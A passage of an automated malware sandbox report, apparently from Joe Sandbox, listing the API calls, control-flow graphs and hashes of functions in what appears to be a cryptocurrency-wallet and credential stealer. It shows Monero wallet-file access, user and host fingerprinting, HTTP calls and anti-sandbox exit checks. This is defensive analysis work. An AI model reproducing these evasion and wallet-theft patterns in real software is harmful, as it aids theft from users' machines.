                                • Part of subcall function 00BF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BF7917
                                • Part of subcall function 00BF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00BF792F
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009B8AD8,?,00C0110C,?,00000000,?,00C01110,?,00000000,00C00AEF), ref: 00BF6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BF6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00BF6AF9
                              • Sleep.KERNEL32(00001770), ref: 00BF6B04
                              • CloseHandle.KERNEL32(?,00000000,?,009B8AD8,?,00C0110C,?,00000000,?,00C01110,?,00000000,00C00AEF), ref: 00BF6B1A
                              • ExitProcess.KERNEL32 ref: 00BF6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2931873225-0
                              • Opcode ID: b20eba3a73f77f7bff12d2f92c4531c3fdf9a76fab9cdb768da72ac69a77a7bf
                              • Instruction ID: 5c634964045ff3733a115de38f21d9b92eeff5a52e8578650272e9abb87419f7
                              • Opcode Fuzzy Hash: b20eba3a73f77f7bff12d2f92c4531c3fdf9a76fab9cdb768da72ac69a77a7bf
                              • Instruction Fuzzy Hash: FB31FE7190010CABDB08FBA5DC56BFE77B8AF04340F1445A8F706B7191DFB05A09C6A6
                              Function 00BF6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 bf6af3 1437 bf6b0a 1436->1437 1439 bf6b0c-bf6b22 call bf6920 call bf5b10 CloseHandle ExitProcess 1437->1439 1440 bf6aba-bf6ad7 call bfaad0 OpenEventA 1437->1440 1446 bf6ad9-bf6af1 call bfaad0 CreateEventA 1440->1446 1447 bf6af5-bf6b04 CloseHandle Sleep 1440->1447 1446->1439 1447->1437
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,009B8AD8,?,00C0110C,?,00000000,?,00C01110,?,00000000,00C00AEF), ref: 00BF6ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BF6AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00BF6AF9
                              • Sleep.KERNEL32(00001770), ref: 00BF6B04
                              • CloseHandle.KERNEL32(?,00000000,?,009B8AD8,?,00C0110C,?,00000000,?,00C01110,?,00000000,00C00AEF), ref: 00BF6B1A
                              • ExitProcess.KERNEL32 ref: 00BF6B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 3c3951f322545e1641ce48d8d1055f6d0db2d6d61719c1aab4f443b7b85586af
                              • Instruction ID: c74bcd563735bdf080d5854ef0a6850e126d515724da60c761857ddf114d233d
                              • Opcode Fuzzy Hash: 3c3951f322545e1641ce48d8d1055f6d0db2d6d61719c1aab4f443b7b85586af
                              • Instruction Fuzzy Hash: 55F03A7094020DAFE720ABA09C4ABBD7BB4EB04701F1445A5BB02A3182CBB0554DD656
                              Function 00BE47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BE4839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00BE4849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 0d340e99fd6236900a05f6c88afa455c1fcb9941a04a74914854c6aeb2e5d1ac
                              • Instruction ID: e3fb29f28f2ef521790ff41134d96bae26004e33093fd8cba90bd75e2f1d4257
                              • Opcode Fuzzy Hash: 0d340e99fd6236900a05f6c88afa455c1fcb9941a04a74914854c6aeb2e5d1ac
                              • Instruction Fuzzy Hash: C52130B1D00209ABDF14DF55E849ADE7B75FB44310F108625F615A7280EB706609DB81
                              Function 00BF51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                              Download Yara Rule

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE6280: InternetOpenA.WININET(00C00DFE,00000001,00000000,00000000,00000000), ref: 00BE62E1
                                • Part of subcall function 00BE6280: StrCmpCA.SHLWAPI(?,009BF440), ref: 00BE6303
                                • Part of subcall function 00BE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BE6335
                                • Part of subcall function 00BE6280: HttpOpenRequestA.WININET(00000000,GET,?,009BEC40,00000000,00000000,00400100,00000000), ref: 00BE6385
                                • Part of subcall function 00BE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BE63BF
                                • Part of subcall function 00BE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BE63D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BF5228
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 1d53187ed6b3fc7938f25d7a84c9a93290fe863ba0756d177fce9fc41e51f5ba
                              • Instruction ID: 2b41b291826ebd475a051846776977e3d237dfbd8480ce5a8702da72daf2f820
                              • Opcode Fuzzy Hash: 1d53187ed6b3fc7938f25d7a84c9a93290fe863ba0756d177fce9fc41e51f5ba
                              • Instruction Fuzzy Hash: 1E110D7090014CAACB18FB64DD52AFD73B8AF50340F5085A8FA0A5B192EF70AB0EC691
                              Function 00BE1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1493 be1220-be1247 call bf89b0 GlobalMemoryStatusEx 1496 be1249-be1271 call bfda00 * 2 1493->1496 1497 be1273-be127a 1493->1497 1499 be1281-be1285 1496->1499 1497->1499 1500 be129a-be129d 1499->1500 1501 be1287 1499->1501 1503 be1289-be1290 1501->1503 1504 be1292-be1294 ExitProcess 1501->1504 1503->1500 1503->1504
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BE123E
                              • ExitProcess.KERNEL32 ref: 00BE1294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: 2e179455a7766d41a22f812da629b8083da9a4a85753a65226ddbdf31f7c394f
                              • Instruction ID: 04ae77499852a5e8aa599eac4d6a51822de22c17ef34ee12525b0ae50e35b502
                              • Opcode Fuzzy Hash: 2e179455a7766d41a22f812da629b8083da9a4a85753a65226ddbdf31f7c394f
                              • Instruction Fuzzy Hash: 45014FB094034CABDB10DFD9CC49BADB7B8AB14701F248494E705B6180D7B455458759
                              Function 00BE1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BE112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00BE1132
                              • ExitProcess.KERNEL32 ref: 00BE1143
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 28e6989673a9f04bbcb4631d559bacc011c71a47ea0a507a3e49f91c989cd150
                              • Instruction ID: 4231900304e1c875de07c3a8a651b71811f68debbe54421d9c4b11461fa596fa
                              • Opcode Fuzzy Hash: 28e6989673a9f04bbcb4631d559bacc011c71a47ea0a507a3e49f91c989cd150
                              • Instruction Fuzzy Hash: A5E08670945348FFE7246BA69C0EB0C76B8EB04B01F200094F709B61C0C7B42605969A
                              Function 00BE10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00BE10B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00BE10F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: e0b99fa96fb0973335892f9f2f16afb9624291e27c0935fd9c3125fcd17c77ab
                              • Instruction ID: 28d3d31b468d16b065a7cba73cd31946878ac51d00f9d3868f1dbb0dc15d8d25
                              • Opcode Fuzzy Hash: e0b99fa96fb0973335892f9f2f16afb9624291e27c0935fd9c3125fcd17c77ab
                              • Instruction Fuzzy Hash: FEF02771641308BBEB149BA9AC49FBFB7ECE705B15F301898F604E3280D6719F04DAA4
                              Function 00BE1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7910
                                • Part of subcall function 00BF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BF7917
                                • Part of subcall function 00BF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00BF792F
                                • Part of subcall function 00BF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BE11B7), ref: 00BF7880
                                • Part of subcall function 00BF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00BF7887
                                • Part of subcall function 00BF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BF789F
                              • ExitProcess.KERNEL32 ref: 00BE11C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: fa8b95954369f1ad304ddb780fc0ba377ad4004180618a705e4410e8677077ec
                              • Instruction ID: c8a92416889e5c216db60edfbbff8d17ad00825e4684e9c292f50f0bc8d5665c
                              • Opcode Fuzzy Hash: fa8b95954369f1ad304ddb780fc0ba377ad4004180618a705e4410e8677077ec
                              • Instruction Fuzzy Hash: B2E012B595430957CE1477B7AC0AB3A32DC9B14385F1C08B9FB05E3202FF39E829856A

                              Non-executed Functions

                              Function 00BF38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00BF38CC
                              • FindFirstFileA.KERNEL32(?,?), ref: 00BF38E3
                              • lstrcat.KERNEL32(?,?), ref: 00BF3935
                              • StrCmpCA.SHLWAPI(?,00C00F70), ref: 00BF3947
                              • StrCmpCA.SHLWAPI(?,00C00F74), ref: 00BF395D
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BF3C67
                              • FindClose.KERNEL32(000000FF), ref: 00BF3C7C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: e682b631011b50d17e71b4929ad7c0163e5ba571521f743660660e9b9edafaaf
                              • Instruction ID: d6150970a3b7ab5dce7b40b5cd07fac6dc17f74800472fc30479aed30ac7dbb9
                              • Opcode Fuzzy Hash: e682b631011b50d17e71b4929ad7c0163e5ba571521f743660660e9b9edafaaf
                              • Instruction Fuzzy Hash: 34A11DB19002089FDB34DBA5DC85FFA73B8BB58700F084598A609A7141EB759B89CF62
                              Function 00BEBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00C00B32,00C00B2B,00000000,?,?,?,00C013F4,00C00B2A), ref: 00BEBEF5
                              • StrCmpCA.SHLWAPI(?,00C013F8), ref: 00BEBF4D
                              • StrCmpCA.SHLWAPI(?,00C013FC), ref: 00BEBF63
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BEC7BF
                              • FindClose.KERNEL32(000000FF), ref: 00BEC7D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
